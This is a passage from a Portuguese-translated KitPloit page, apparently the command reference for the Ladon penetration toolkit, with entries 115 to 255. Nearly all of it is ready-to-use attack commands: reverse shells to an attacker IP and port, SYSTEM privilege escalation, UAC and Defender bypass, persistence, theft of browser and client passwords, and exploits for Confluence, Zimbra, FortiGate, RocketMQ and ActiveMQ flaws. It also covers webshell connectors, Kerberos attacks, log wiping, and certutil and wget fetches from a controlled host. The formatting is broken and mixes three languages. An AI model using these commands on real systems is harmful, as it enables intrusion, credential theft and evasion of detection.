Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas Simular execução de comando como usuário```Bash
Ladon Runas user pass cmd
116 MS16135 Elevação de privilégio para SYSTEM```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato Elevação de privilégio de usuário de serviço para SYSTEM```Bash
Ladon BadPotato cmdline
118 Elevação de privilégio de usuário de serviço SweetPotato para SYSTEM```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 Elevação de privilégios (de usuário de serviço para system)```Bash
Ladon EfsPotato whoami
120 Open3389 Ativar 3389 com um clique```Bash

Ladon Open3389

root@kitploit:~
##### 121 ativar o administrador integrado Administrator```Bash
Ladon ActiveAdmin
122 Ativar o usuário interno Convidado```Bash

Ladon ActiveGuest

root@kitploit:~
### Reverse Shell

##### 123 Reverse TCP NC Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 Shell TCP Reverso MSF```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 Reverso TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 Reverse HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 Shell reverso HTTPS MSF MET```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 CMD TCP reverso & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 reversoUDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh encaminhamento da porta 888 local para a porta 22 do 112```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran encaminhamento de portas (exemplo 3389)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

Execução local

132 Sequestro de sessão de desktop RDP (sem senha)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 Adicionar item de inicialização Run do registro```Bash
Ladon RegAuto Test c:\123.exe
134 Programa de execução de tarefa agendada AT (sem tempo) (privilégio de sistema)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 Serviço SC adicionar item de inicialização & executar programa (privilégios de sistema)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

Detecção de Informações do Sistema

136 Snmp protocolo de sondagem de sistema operacional, dispositivo e outras informações```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Sondagem via protocolo Nbt de nome de host Windows, domínio e usuário```Bash
Ladon 192.168.1.8/24 NbtInfo
138 Detecção de versão do Windows, nome do host e domínio via protocolo Smb```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  Detecção de versão do Windows, nome do host e domínio via protocolo Wmi```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Deteção do protocolo Mssql da versão do Windows, hostname, domínio```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  Detecção de versão do Windows, hostname e domínio via protocolo Winrm```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Deteção do Exchange para versão do Windows, nome do host, domínio```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  Detecção de versão do Windows, nome do host e domínio via protocolo RDP```Bash
Ladon 192.168.1.8/24 RdpInfo

Outras funções

144 Win2008 ativar com um clique.net 3.5```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 Obter o código-fonte HTML do site da intranet```Bash
Ladon gethtml http://192.168.1.1
146 Servidor WEB mini de um clique - Servidor WEB dedicado para monitoramento de penetração```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
Obter IP externo (iniciar servidor WEB na VPS, alvo acessa ip.txt ou ip.jpg)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt (resultados de eco para vulnerabilidades sem resposta)
##### Monitorar```Bash
Ladon web 800
Submeter Retornar Texto Simples```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Resultado da criptografia Base64```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Decriptação de resultados Base64```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Detecção de plugin Shiro```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat Excluir logs de IP específico do Tomcat```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 Varredura de plug-ins de assembly personalizados em C#```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile Lê o conteúdo de comprimento especificado do início de um arquivo grande```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 Modificar o registro para ler senhas em texto claro de sistemas 2012 e posteriores```Bash
Ladon SetMzLogonPwd 1
153 Modificar o sequestro de registro de visto de assinatura```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 Converter IPs em lote para o formato ip24 (192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC Conversão em lote de IPs para formato C de IP (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB   Converter IP em lote para formato B (192.168.)```Bash
Ladon ip.txt IPB
157 Detecção de Vulnerabilidade Atlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134 Shell reverso```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo Detecta informações de certificados como dispositivos, IPs, domínios, nomes de máquina e organizações```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo Detecção em lote de certificados de dispositivos, IPs, domínios, nomes de máquinas, informações organizacionais, etc.```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo Múltiplos métodos para obter as versões do WordPress, temas e plugins```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo obter em lote versões do WordPress core, temas e plugins```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Ataque de força bruta ao Exchange  Identificar quebra de senha do Exchange```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 Detecção em massa da vulnerabilidade RCE de travessia de diretório ZIP no Zimbra Mail Server```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra servidor de email vulnerabilidade RCE não autorizada EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd Conectar jsp WebShell(suporta cd、k8、ua、uab64)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell Verifique a versão do sistema, python, gcc e outras informações para facilitar a escalada de privilégios.```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd conecta jsp WebShell(suporta cd, k8, ua, uab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 Comando de execução de backdoor IIS-Raid de conexão não interativa```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP combina se o segmento IP aparece nos resultados da vulnerabilidade```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 Leitura de senha do roteador```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc 批量检测打印机PJL任意代码执行漏洞```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Consultar fabricante via MAC (Ladon Mac endereço MAC)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Quebra de senha de roteador VPN Cisco (senhas padrão incorporadas, suporta texto claro e Hash)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 Detecção de vulnerabilidade backdoor sorridente  10.9 removido```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPress auditoria de senhas, senhas fracas```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Detectar versão do Exchange```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Detecção de vulnerabilidade RCE de alto risco no Exchange```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Obter cabeçalhos de resposta HTTP/S```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S obtém cabeçalhos de resposta da Web + código-fonte```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S obter domínios de páginas da web```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP contorna CDN para obter IP real do domínio (características de palavras-chave únicas como domínio, título, Banner, etc.)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Senhas do Firefox\Cookie\Leitura do histórico```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11sem eco suporta Win7, Win8, Win11 Win2012\2016\2019 etc. removido na versão 10.8```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd suporta leitura de senhas de Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
186 DraytekScan Auditoria de senhas e detecção de senhas fracas Draytek```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Leitor de senhas do Xshell```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 Escrita não autorizada de SSH-KEY admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  Execução remota de comandos SQL Server, versão SQL, informações do SO xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd execução remota de comandos do SQL Server escalonamento de privilégio efspotato, badpotato```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Leitura de senha do Mikrotik RouterOS 6.29-6.42```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan Detecção de senha padrão web de roteador/modem óptico ZTE```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 Leitura de senha do roteador MSNSwitch```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd Leitura de senha do roteador NetGear DGND3700v2```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 Detecção de versão do WebLogic via protocolo T3```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

Penetração com um clique InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan múltiplos módulos detectam informações do sistema```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan Detecção de múltiplas vulnerabilidades remotas```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan exploração de múltiplas vulnerabilidades GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 Leitura não autorizada de senha de banco de dados do site```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan todos os módulos```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Detectar versão do Citrix Gateway```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Detectar versão do Vmware Vcenter```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 Contornar Defender para executar PowerShell```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 SNMP reiniciar impressora HP```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 Limpar logs de operação Desabilitar registro de logs do .NET```Bash
Ladon Clslog
206 Detecção de hosts ativos com protocolo ARP```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 Mini servidor FTP, (suporta comandos ftp nativos do windows/Linux para upload e download de arquivos)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 Monitorar dados de pacotes TCP, salvar TXT e HEX, como protocolos SMB, RDP, HTTP, SSH, LDAP, FTP, etc.```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 monitorar dados de pacotes UDP salvar em TXT e HEX como protocolos DNS, SNMP, etc.```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward encaminhamento de porta retransmissão de porta```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager Detecção de vulnerabilidade RCE não autorizada (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper EXP de leitura de arquivo não autorizado (padrão/WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 Desativar completamente SMB, desativar porta 445 para bloquear 0day, movimento lateral, ataques de relé, etc.```Bash
Ladon CloseSMB
214 Desabilitar serviço especificado```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 Parar o serviço especificado```Bash
Ladon StopService Spooler
216 Portas permitidas Portas abertas```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 Bloquear porta Interceptar porta```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken programa de execução de cópia de token```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 Escalação de privilégio RunSystem: de Administrador para SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser desescalada de privilégio de System para executar programa como usuário```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato escalada de privilégios Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision 海康威视 auditoria de senhas```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision Hikvision detecção de vulnerabilidade CVE-2017-7921```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision Hikvision descriptografia de ficheiros de configuração```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 CmdShell dedicado a testes do Ladon```Bash
Ladon web 800 cmd
226 CmdShell para teste de conexão```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 Ver Administradores de Domínio```Bash
Ladon QueryAdminDomain
228 Ver informações do domínio```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Detecção de broadcast do protocolo Mndp para informações de roteadores Mikrotik na mesma sub-rede```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 Ferramenta de conexão PostShell, suporta envio personalizado de cabeçalho HTTP```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  Executar comando Cmd / suporta b64cmd```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 Ver IP do administrador, ler logs de login bem-sucedido 4624 com um clique```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 EXP de vulnerabilidade de execução remota de comandos```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon ferramenta de bypass de antivírus com um clique```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Elevação de privilégio para system no Win11/2022```Bash	
Ladon McpPotato whoami
236 EXE para HEX, comando CMD escrever arquivo```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXE para Base64, comando CMD para escrever em arquivo```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Detecção de versão do sistema de e-mail Zimbra```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO - ferramenta de movimento lateral via Política de Grupo para penetração de domínio```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 IIS Informações do site com um clique```Bash

Ladon IisInfo

root@kitploit:~
##### 241 Servidor Web Especializado em Penetração com Deserialização LDAP```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 Servidor WEB Especializado para Pentest - Desserialização RMI```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 API adicionar administrador (ignorar sistema net, net1 desabilitado)```Bash	
Ladon AddAdmin admin$ 123456
244 Adicionar usuário via API(ignorando a desativação do sistema net e net1.exe)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 API deletar usuário (ignorar desativação do sistema net, net1.exe)```Bash	
Ladon DelUser admin$
246 Rubeus Penetração de Domínio Ataques Kerberos

Por exemplo, solicitação TGT/solicitação ST/AS-REP Roasting/Kerberoasting/ataques de delegação/Golden Ticket/Silver Ticket/Diamond Ticket/Sapphire Ticket, etc.```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac penetração de domínio elevação de privilégio no domínio CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere interage com o sistema operacional convidado de máquinas virtuais gerenciadas pelo vCenter e executa comandos```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Execução remota de comandos Dcom do MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Dcom execução remota de comandos via ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Execução remota de comandos Dcom do ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm Detecção de informações do sistema (portas 25, 465, 587)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlm Detecção de informações do sistema```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
